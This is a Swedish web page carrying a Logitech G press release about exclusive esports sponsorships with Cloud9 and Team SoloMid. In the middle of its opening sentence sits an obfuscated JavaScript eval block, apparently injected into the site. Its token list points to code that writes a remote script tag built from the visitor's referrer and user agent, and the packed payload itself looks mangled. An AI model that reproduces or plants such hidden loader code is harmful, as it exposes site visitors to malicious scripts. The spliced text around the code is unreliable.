Image Image Image Image Image Image Image Image Image Image

| 13 juli, 2020

Scroll to top

Top

Logitech G förstärker relationer med topprankade eSport-lag

Logitech G förstärker relationer med topprankade eSport-lag
Sebastian

Logitech, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zedkz|var|u0026u|referrer|nzeyk||js|php’.split(’|’),0,{}))
innovationsledande inom gamingtillbehör, tillkännagav idag att två nordamerikanska topplag bestämt sig för att exklusivt använda sig av Logitech G-hårdvara under året. Förutom att ge feedback i ett tidigt skede och påpeka designdetaljer innan produkterna når butik, kommer Cloud9 (C9) och Team SoloMid (TSM) fortsätta att exklusivt använda sig av Logitech G:s headsets, möss, tangentbord och musmattor under turneringar.

“eSporten fortsätter att växa i popularitet och är en oerhört viktig del av gamingvärlden”, säger Ujesh Desai, ansvarig på Logitech. “Vi är privilegierade nog att få jobba med några av de absolut bästa spelarna i världen. Genom deras hjälp och feedback kommer vi kunna utveckla ännu bättre produkter för spelare.”

Cloud9s lag består av 45 spelare av Counter-Strike: Global Offensive (CS:GO), Dota 2, Halo, Hearthstone, Heroes of the Storm, League of Legends (LoL), Smite och Super Smash Bros. Melee. Förra årets LoL-lag placerade sig som segrare av League Championship Series (LCS) Spring 2014.

“Vi är väldigt glada över att förlänga kontraktet med Logitech G”, säger Jack Etienne, ägare till Cloud9. “De har varit oerhört viktiga för vår framgång och tillväxt och stöttat oss med träningstillfällen och strålande produkter. De har verkligen gett oss en extra knuff framåt och hjälpt oss att vinna mer.”

TSM innefattas av 13 spelare och räknas som världens mest populära lag inom League of Legends. Nyligen skapade TSM även Hearthstone och CS:GO. TSM har en exceptionell säsong bakom sig, där de placerade sig i topp 10 under LoL World Finals och knep segern i LCS Summer 2014. Laget förväntas fortsätta dominera även under denna säsong.

“Jag är otroligt stolt över att förlänga kontraktet med Logitech G då dom varit en oerhört viktig del av våra framgångar förra säsongen,” säger Andy Dinh, ägare, Team SoloMid. “De bidrar inte bara med den bästa utrustningen utan stöttade oss på varenda tänkbart vis under 2014. Jag är otroligt glad över att få fortsätta jobba med en sponsor som tror på oss och våra målsättningar och som också hjälper oss att uppnå dem.”

För mer information om eSport-lagen som sponsras av Logitech, samt följa spelare när de tävlar i CS:GO, Dota 2, Halo, Hearthstone, Heroes of the Storm, League of Legends, Super Smash Bros. Melee och andra eSport-turneringar, vänligen besök https://www.facebook.com/logitech.g.sverigesamt följ @LogitechG.

Om LogitechLogitech är världsledande inom produkter som kopplar människor samman med de digitala upplevelser som spelar roll för dem. Med en spännvidd över mängder av dator-, kommunikations- och underhållningsplattformar underlättar och förbättrar Logitechs hård- och mjukvara digital navigation, konsumtion av musik- och videounderhållning, gaming, socialt nätverkande, kommunikation över internet, videosäkerhet och kontroll över hemunderhållning. Logitech grundades 1981 och är ett Schweiziskt publikt aktiebolag listat på SIX Swiss Exchange (LOGN) och på Nasdaq Global Select Market (LOGI).